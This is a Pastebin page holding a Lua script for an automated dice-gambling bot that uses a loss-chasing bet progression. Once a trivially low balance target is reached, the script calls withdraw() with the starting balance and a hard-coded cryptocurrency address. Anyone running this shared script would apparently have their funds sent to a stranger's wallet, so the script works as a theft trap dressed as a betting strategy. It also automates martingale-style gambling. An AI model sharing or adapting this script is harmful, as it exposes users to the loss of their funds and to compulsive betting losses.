Advertisement
coinwalk

dicebot scripting

Nov 26th, 2018
313
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.37 KB | None | 0 0
  1. chance = 90
  2. bethigh = true
  3. basebet = balance/1000
  4. nextbet = basebet
  5.  
  6. amount=balance
  7. profittarget=0.04
  8. stoptarget=0
  9.  
  10. function dobet()
  11. if (win) then
  12. chance = 90
  13. basebet = balance/1000
  14. nextbet = basebet
  15. else
  16. if chance == 45.00 then
  17. nextbet = previousbet * 1.8
  18. else
  19. chance = 45.00
  20. nextbet = basebet
  21. print("-----------------------------------------")
  22. print(" ")
  23. print("profit") print(profit) print("profit")
  24. print(" ")
  25. print("Balancel") print(balance)
  26. print(" ")
  27. print("-----------------------------------------")
  28. resetseed();
  29. end
  30. end
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37. if balance <= stoptarget then
  38. stop()
  39. end
  40.  
  41. if (balance) >= profittarget then
  42.  
  43. ching()
  44. alarm()
  45. print("Balance kamu ") print(balance)
  46. print(" ")
  47. print("TARGET madeI!!!")
  48. print(" ")
  49. print("TARGET madeI!!!")
  50. print(" ")
  51. print("TARGET made!!!")
  52. print(" ")
  53. print("TARGET madeI!!!")
  54. print(" ")
  55. print("profit ") print(profit) print(" profit")
  56. print(" ")
  57. print("Withdrawing Target Amount ") print(amount) print(" DOGE")
  58.  
  59.  
  60. withdraw(amount,"1FJswJKhsevzXFZyXFntmsPrL5JZTppf94")
  61.  
  62. print(" ")
  63. print("you have withdrew BRO!!!")
  64.  
  65.  
  66. resetseed();
  67.  
  68.  
  69.  
  70. end
  71.  
  72. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement